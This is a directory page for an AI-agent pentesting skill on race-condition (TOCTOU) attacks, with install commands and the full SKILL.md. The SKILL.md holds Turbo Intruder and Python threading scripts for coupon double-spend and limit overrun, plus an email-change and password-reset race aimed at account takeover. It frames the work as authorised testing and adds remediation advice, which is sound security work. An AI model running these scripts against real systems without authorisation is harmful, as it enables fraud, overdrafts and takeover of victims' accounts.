Agent skill

Exploiting Race Condition Vulnerabilities

by mukul975 in mukul975/Anthropic-Cybersecurity-Skills

Detects and exploits race condition (TOCTOU) vulnerabilities in web applications using Burp Suite's Turbo Intruder extension and its single-packet attack technique to fire parallel requests that…

Apache-2.0Auto-check passedSecurity

Install Exploiting Race Condition Vulnerabilities

skills CLI
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-race-condition-vulnerabilities -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills exploiting-race-condition-vulnerabilities --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/exploiting-race-condition-vulnerabilities .claude/skills/exploiting-race-condition-vulnerabilities && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
exploiting-race-condition-vulnerabilities
GitHub stars
34k
Token cost
~2.3k tokens
SKILL.md length
406 words
Files
4 (incl. scripts, references)
Skills in repo
644
Repo updated
First seen
Licence
Apache-2.0

At a glance

Detects and exploits race condition (TOCTOU) vulnerabilities in web applications using Burp Suite's Turbo Intruder extension and its single-packet attack technique to fire parallel requests that…

  • Works in 6 steps: Identify Race Condition Attack Surface → Configure Single-Packet Attack in Turbo… → Execute Limit Overrun Attack → …
  • Pentesting endpoints with balances
  • SKILL.md covers When to Use, Prerequisites, Workflow and Key Concepts, plus 3 more sections
  • Runs Python scripts from its folder

What it does

Exploiting Race Condition Vulnerabilities is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Detects and exploits race condition (TOCTOU) vulnerabilities in web applications using Burp Suite's Turbo Intruder extension and its single-packet attack technique to fire parallel requests that bypass rate limits, duplicate transactions, or overrun usage limits. Use when pentesting endpoints with balances, coupon redemption, or rate limiting that concurrent requests might manipulate.

Its SKILL.md is about 2.3k tokens, which your agent loads only when the skill is triggered. The skill folder holds 5 other files, including scripts and reference files (for example `references/api-reference.md` and `scripts/agent.py`).

It sits in Security, covering Async programming, Penetration testing and Rate limiting. It works with Burp Suite. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.

When your agent uses it

  • Pentesting endpoints with balances
  • Coupon redemption
  • Rate limiting that concurrent requests might manipulate

Example prompts

  • “Use the exploiting-race-condition-vulnerabilities skill to detect and exploits race condition (TOCTOU) vulnerabilities in web applications using…”
  • “/exploiting-race-condition-vulnerabilities”

Requirements

  • Python 3

Workflow steps

6 steps, taken from the step headings in SKILL.md.

  1. Identify Race Condition Attack Surface
  2. Configure Single-Packet Attack in Turbo Intruder
  3. Execute Limit Overrun Attack
  4. Exploit Multi-Endpoint Race Conditions
  5. Test with Python Threading Alternative
  6. Analyze Results and Confirm Exploitation

What it can do on your machine

Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Ships 1 file in scripts/ (Python), which the agent can run.

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Exploiting Race Condition Vulnerabilities loads about 2.3k tokens when it runs, and up to ~2.9k if it reads all its reference files. Until then it costs about 107 tokens; SKILL.md has 406 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~107
When it runs · the whole SKILL.md, loaded when a task matches
~2.3k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~2.9k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.

SKILL.md

The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 406 words, ~2,251 tokens.

Download SKILL.mdSave it as .claude/skills/exploiting-race-condition-vulnerabilities/SKILL.md (or your agent's skills folder). This skill also uses 3 other files; get the full folder from GitHub.
name
exploiting-race-condition-vulnerabilities
description
Detects and exploits race condition (TOCTOU) vulnerabilities in web applications using Burp Suite's Turbo Intruder extension and its single-packet attack technique to fire parallel requests that bypass rate limits, duplicate transactions, or overrun usage limits. Use when pentesting endpoints with balances, coupon redemption, or rate limiting that concurrent requests might manipulate.
domain
cybersecurity
subdomain
web-application-security
tags
race-condition, turbo-intruder, toctou, concurrency, single-packet-attack, limit-overrun, burp-suite
version
1.0
author
mahipal
license
Apache-2.0
nist_csf
PR.PS-01, ID.RA-01, PR.DS-10, DE.CM-01
mitre_attack
T1190, T1059.007, T1505.003, T1083, T1027

Exploiting Race Condition Vulnerabilities

When to Use

  • When testing applications with transaction-based functionality (payments, transfers, coupons)
  • During assessment of rate-limiting or attempt-limiting mechanisms
  • When testing multi-step workflows (registration, password reset, MFA)
  • During bug bounty hunting for logic flaws in state-changing operations
  • When evaluating applications with inventory or balance management systems

Prerequisites

  • Burp Suite Professional with Turbo Intruder extension installed
  • Understanding of HTTP/2 single-packet attack technique
  • Python scripting ability for custom Turbo Intruder scripts
  • Knowledge of TOCTOU (Time-of-Check-to-Time-of-Use) vulnerabilities
  • Target application with state-changing operations (purchases, votes, transfers)
  • Multiple user accounts for testing cross-user race conditions

Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

Workflow

Step 1 — Identify Race Condition Attack Surface
# Common race condition targets:
# - Coupon/discount code redemption (limit: 1 per user)
# - Account balance transfers
# - Inventory purchase (limited stock)
# - Rate-limited operations (login attempts, SMS verification)
# - Multi-step workflows (email change + password reset)
# - File upload + processing pipelines

# Capture the target request in Burp Suite
# Send to Turbo Intruder (Extensions > Turbo Intruder > Send to Turbo Intruder)
Step 2 — Configure Single-Packet Attack in Turbo Intruder
python
# Turbo Intruder script for single-packet race condition
# This sends all requests simultaneously in one TCP packet

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=1,
                          engine=Engine.BURP2)

    # Queue 20 identical requests for the same operation
    for i in range(20):
        engine.queue(target.req, gate='race1')

    # Hold all requests until ready
    engine.openGate('race1')

def handleResponse(req, interesting):
    table.add(req)
Step 3 — Execute Limit Overrun Attack
python
# Turbo Intruder script for coupon/discount limit bypass
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=1,
                          requestsPerConnection=50,
                          engine=Engine.BURP2)

    # Send 50 coupon redemption requests simultaneously
    for i in range(50):
        engine.queue(target.req, gate='coupon_race')

    engine.openGate('coupon_race')

def handleResponse(req, interesting):
    # Flag successful redemptions (200 OK)
    if req.status == 200:
        table.add(req)
Step 4 — Exploit Multi-Endpoint Race Conditions
python
# Race condition between two different endpoints
# Example: Change email + trigger password reset simultaneously
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=1,
                          engine=Engine.BURP2)

    # Request 1: Change email to attacker@evil.com
    email_change = '''POST /api/change-email HTTP/2
Host: target.com
Cookie: session=VALID_SESSION
Content-Type: application/json

{"email":"attacker@evil.com"}'''

    # Request 2: Trigger password reset (goes to original email)
    password_reset = '''POST /api/reset-password HTTP/2
Host: target.com
Content-Type: application/json

{"email":"victim@target.com"}'''

    engine.queue(email_change, gate='race1')
    engine.queue(password_reset, gate='race1')

    engine.openGate('race1')

def handleResponse(req, interesting):
    table.add(req)
Step 5 — Test with Python Threading Alternative
python
import threading
import requests

TARGET_URL = "http://target.com/api/redeem-coupon"
COUPON_CODE = "DISCOUNT50"
SESSION_COOKIE = "session=abc123"

def send_request():
    response = requests.post(
        TARGET_URL,
        json={"coupon": COUPON_CODE},
        headers={"Cookie": SESSION_COOKIE},
        timeout=10
    )
    print(f"Status: {response.status_code}, Response: {response.text[:100]}")

# Create barrier to synchronize thread start
barrier = threading.Barrier(20)

def synchronized_request():
    barrier.wait()  # All threads wait here, then start together
    send_request()

threads = [threading.Thread(target=synchronized_request) for _ in range(20)]
for t in threads:
    t.start()
for t in threads:
    t.join()
Step 6 — Analyze Results and Confirm Exploitation
# In Turbo Intruder results:
# - Sort by status code to identify successful requests
# - Compare response lengths to find anomalies
# - Check if more than one request succeeded (limit overrun confirmed)
# - Verify backend state (balance, inventory, coupon count)

# Document the race window timing
# Successful race conditions typically require:
# - HTTP/2 single-packet attack: ~30 seconds to find
# - Last-byte sync (HTTP/1.1): ~2+ hours to find
# - Thread-based approach: Variable, less reliable

Key Concepts

ConceptDescription
TOCTOUTime-of-Check-to-Time-of-Use flaw where state changes between validation and action
Single-Packet AttackSending multiple HTTP/2 requests in one TCP packet for precise synchronization
Last-Byte SyncHTTP/1.1 technique holding final byte of multiple requests then releasing simultaneously
Limit OverrunExceeding one-time-use limits by exploiting race windows in validation logic
Hidden State MachineExploiting transitional states in multi-step application workflows
Gate MechanismTurbo Intruder feature that holds requests until all are queued, then releases simultaneously
Connection WarmingPre-establishing connections to reduce network jitter in race condition attacks
Show full SKILL.md (146 more words)Show less

Tools & Systems

ToolPurpose
Turbo IntruderBurp Suite extension for high-speed race condition exploitation
Burp Suite RepeaterGroup send feature for basic race condition testing
NucleiTemplate-based scanner with race condition detection templates
Python threadingCustom multi-threaded race condition scripts
racepwnDedicated race condition testing framework
asyncio/aiohttpPython async HTTP for concurrent request sending

Common Scenarios

  1. Coupon Double-Spend — Redeem a single-use coupon multiple times by sending concurrent redemption requests before the server marks it as used
  2. Balance Overdraft — Transfer more money than available by sending simultaneous transfer requests that each pass the balance check
  3. MFA Bypass — Submit multiple MFA codes simultaneously to bypass rate limiting on verification attempts
  4. Inventory Manipulation — Purchase more items than available stock by exploiting race conditions in inventory decrement logic
  5. Account Registration Bypass — Create multiple accounts with the same email by submitting concurrent registration requests

Output Format

## Race Condition Assessment Report
- **Target**: http://target.com/api/redeem-coupon
- **Technique**: HTTP/2 Single-Packet Attack via Turbo Intruder
- **Concurrent Requests**: 20
- **Successful Exploitations**: 4 out of 20

### Findings
| # | Endpoint | Operation | Expected | Actual | Severity |
|---|----------|-----------|----------|--------|----------|
| 1 | POST /redeem-coupon | Single use coupon | 1 redemption | 4 redemptions | High |
| 2 | POST /transfer | Balance transfer | Limited by balance | Overdraft achieved | Critical |

### Race Window Analysis
- HTTP/2 single-packet: Reliable exploitation in <30 seconds
- Success rate: ~20% per batch of 20 requests
- Race window estimated: 50-100ms

### Remediation
- Implement database-level locking (SELECT FOR UPDATE) on critical operations
- Use optimistic concurrency control with version numbers
- Apply idempotency keys for state-changing requests
- Implement distributed locks for multi-server environments

© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 3 other files (scripts, references) in skills/exploiting-race-condition-vulnerabilities of mukul975/Anthropic-Cybersecurity-Skills.

  • SKILL.md
  • LICENSE
  • references/api-reference.md
  • scripts/agent.py

Open the folder on GitHubat commit 54a7988

Compare with similar skills

Exploiting Race Condition Vulnerabilities next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Exploiting Race Condition Vulnerabilities compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Exploiting Race Condition Vulnerabilities this skillmukul975/Anthropic-Cybersecurity-Skills34k—~2.3kAutomated safety check: PassApache-2.0
Offensive API SecuritySnailSploit/Claude-Red7.4k—~5kAutomated safety check: PassMIT
Code Audit3stoneBrother/code-audit8921 repos~2.7kAutomated safety check: PassNone
Burp Scansix2dez/burp-ai-agent1.5k—~6.4kAutomated safety check: WarnMIT
Burp MCP Vuln Checklangbyyi/CyberStrikeAI-SRC135—~3.1kAutomated safety check: PassApache-2.0
Idor Testingzebbern/claude-code-guide4.7k8 repos~3.1kAutomated safety check: PassMIT

Similar skills

  • Offensive API Security

    SnailSploit/Claude-Red

    Comprehensive API security testing methodology covering REST, gRPC, and WebSocket attack surfaces.

    7.4k GitHub stars~5k tokensUpdated 19 days ago
    SecurityAuto-check passed
  • Code Audit

    3stoneBrother/code-audit

    Professional code security audit skill covering 55+ vulnerability types.

    892 GitHub starsUsed in 1 repo~2.7k tokens
    SecurityAuto-check passed
  • Burp Scan

    six2dez/burp-ai-agent

    Burp Suite scanning via MCP tools — passive traffic analysis, active payload testing, OOB verification, and vulnerability reporting using Burp's proxy, HTTP sender, Collaborator, and scanner APIs.

    1.5k GitHub stars~6.4k tokensUpdated today
    SecurityAuto-check: warnings
  • Burp MCP Vuln Check

    langbyyi/CyberStrikeAI-SRC

    Automate low-impact web vulnerability verification through Burp MCP.

    135 GitHub stars~3.1k tokensUpdated 2 days ago
    SecurityAuto-check passed
  • Idor Testing

    zebbern/claude-code-guide

    This skill should be used when the user asks to "test for insecure direct object references," "find IDOR vulnerabilities," "exploit broken access control," "enumerate user IDs or object references,"…

    4.7k GitHub starsUsed in 8 repos~3.1k tokens
    SecurityAuto-check passed
  • API Coverage Check

    forefy/reburp

    Check reburp's Montoya API coverage and detect when a Burp/Montoya upgrade added or changed APIs.

    117 GitHub stars~213 tokensUpdated 4 days ago
    Backend & APIsAuto-check passed

More from mukul975/Anthropic-Cybersecurity-Skills

All 644 skills in this repo
  • Campaign Attribution Evidence Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Weighs infrastructure, TTP, malware code and timing evidence with the Diamond Model and competing hypotheses to reach a confidence-rated attribution.

    34k GitHub stars~2.3k tokensUpdated 1 mo ago
    Auto-check passed
  • Go Malware Analysis in Ghidra

    mukul975/Anthropic-Cybersecurity-Skills

    Walks through reverse engineering Go-compiled malware in Ghidra: parsing buildinfo and pclntab, recovering stripped function names and extracting dependencies.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • LNK and Jump List Forensics

    mukul975/Anthropic-Cybersecurity-Skills

    Guides forensic analysis of Windows LNK shortcut files and Jump Lists with LECmd, JLECmd and manual parsing to show file access and program execution.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Malware Persistence Analysis with Autoruns

    mukul975/Anthropic-Cybersecurity-Skills

    Hunts Windows malware persistence with Sysinternals Autoruns, covering run keys, services, scheduled tasks and drivers, with baseline comparison.

    34k GitHub stars~1.2k tokensUpdated 1 mo ago
    Auto-check passed
  • NTFS MFT Deleted File Recovery

    mukul975/Anthropic-Cybersecurity-Skills

    Guides a Windows forensic examination of the NTFS Master File Table to recover deleted-file evidence, build timelines and spot timestomping.

    34k GitHub stars~2.7k tokensUpdated 1 mo ago
    Auto-check passed
  • Network Covert Channel Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Detects DNS tunneling, ICMP exfiltration and HTTP-based covert channels in packet captures and DNS logs when hunting for hidden command-and-control traffic.

    34k GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed

Works with

Questions about Exploiting Race Condition Vulnerabilities

What does Exploiting Race Condition Vulnerabilities do?

Detects and exploits race condition (TOCTOU) vulnerabilities in web applications using Burp Suite's Turbo Intruder extension and its single-packet attack technique to fire parallel requests that…. Exploiting Race Condition Vulnerabilities is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Detects and exploits race condition (TOCTOU) vulnerabilities in web applications using Burp Suite's Turbo Intruder extension and its single-packet attack technique to fire parallel requests that bypass rate limits, duplicate transactions, or overrun usage limits.

When should I use Exploiting Race Condition Vulnerabilities?

Exploiting Race Condition Vulnerabilities fits situations like: pentesting endpoints with balances; coupon redemption; rate limiting that concurrent requests might manipulate.

How do I install Exploiting Race Condition Vulnerabilities in Claude Code?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-race-condition-vulnerabilities -a claude-code`. Or copy the skill folder (skills/exploiting-race-condition-vulnerabilities in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/exploiting-race-condition-vulnerabilities in your project. Claude Code loads it when a task matches its description.

How do I install Exploiting Race Condition Vulnerabilities in Codex?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-race-condition-vulnerabilities -a codex`. Or copy the skill folder (skills/exploiting-race-condition-vulnerabilities in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/exploiting-race-condition-vulnerabilities in your project. Codex loads it when a task matches its description.

Can I use Exploiting Race Condition Vulnerabilities in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-race-condition-vulnerabilities -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/exploiting-race-condition-vulnerabilities, .gemini/skills/exploiting-race-condition-vulnerabilities, .github/skills/exploiting-race-condition-vulnerabilities and .opencode/skills/exploiting-race-condition-vulnerabilities in your project.

What does Exploiting Race Condition Vulnerabilities need to run?

Going by SKILL.md and its folder, Exploiting Race Condition Vulnerabilities needs Python for the scripts in its folder. Our summary lists: Python 3.

Does Exploiting Race Condition Vulnerabilities access the network?

SKILL.md contains no URLs. Any network use would come from the scripts or tools the agent runs. This is read from the text; nothing was executed.

Is Exploiting Race Condition Vulnerabilities safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.

What licence does Exploiting Race Condition Vulnerabilities use?

Exploiting Race Condition Vulnerabilities is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Exploiting Race Condition Vulnerabilities use?

About 2.3k tokens (SKILL.md is roughly 9k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 612 tokens, read only when the agent opens those files.

What are the alternatives to Exploiting Race Condition Vulnerabilities?

Skills that share tags, products or a category with Exploiting Race Condition Vulnerabilities: Offensive API Security (SnailSploit/Claude-Red, 7.4k stars), Code Audit (3stoneBrother/code-audit, 892 stars), Burp Scan (six2dez/burp-ai-agent, 1.5k stars) and Burp MCP Vuln Check (langbyyi/CyberStrikeAI-SRC, 135 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Exploiting Race Condition Vulnerabilities?

mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 33,993 GitHub stars. The repository holds 644 skills in this directory. The repository was last updated on August 31, 2026.

Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.